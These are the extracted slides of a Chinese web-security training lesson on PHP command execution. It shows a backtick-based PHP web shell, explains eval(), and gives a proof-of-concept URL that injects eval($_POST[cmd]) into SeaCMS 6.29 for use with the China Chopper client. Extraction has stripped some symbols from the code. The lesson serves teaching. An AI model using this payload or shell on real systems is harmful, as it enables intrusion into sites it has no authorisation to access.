Web攻防视频教程第五节 命令执行漏洞利用-01.pdf

Web攻防训练营

命令执行漏洞利用

课程内容

1.PHP下命令执行补充3.命令执行实验环境搭建

2.PHPeval函数介绍4.命令执行漏洞案例演示

01

PHP下命令执行补充

PHP下命令执行补充

在PHP中，除了函数可以执行系统命令。反引号`也可以作为系统命令执行来使用。

?php

echopre;

if(isset($_GET[cmd])){

$cmd=$_GET[cmd];

echo`$cmd`;

}

echo/pre;

?

02

PHPeval函数介绍

PHPeval函数介绍

eval()函数把字符串按PHP代码来计算。

该字符串必须是合法的PHP代码，且必须以分号结尾。

如果没有在代码字符串中调用return语句，则返回NULL。如果代码中存在解析错误，则eval()函数返

回false。

03

命令执行实验环境搭建

命令执行实验环境搭建

下载海洋cms6.29作为演示实验代码。

04

命令执行漏洞案例演示

命令执行漏洞案例演示

利用菜刀连接命令执行的位置。（也被称为代码执行）

POC:/search.php?searchtype=5tid=area=eval($_POST[cmd])

总结

1.PHP下命令执行补充3.命令执行实验环境搭建

2.PHPeval函数介绍4.命令执行漏洞案例演示

再见

欢迎关注Web安全训练营课程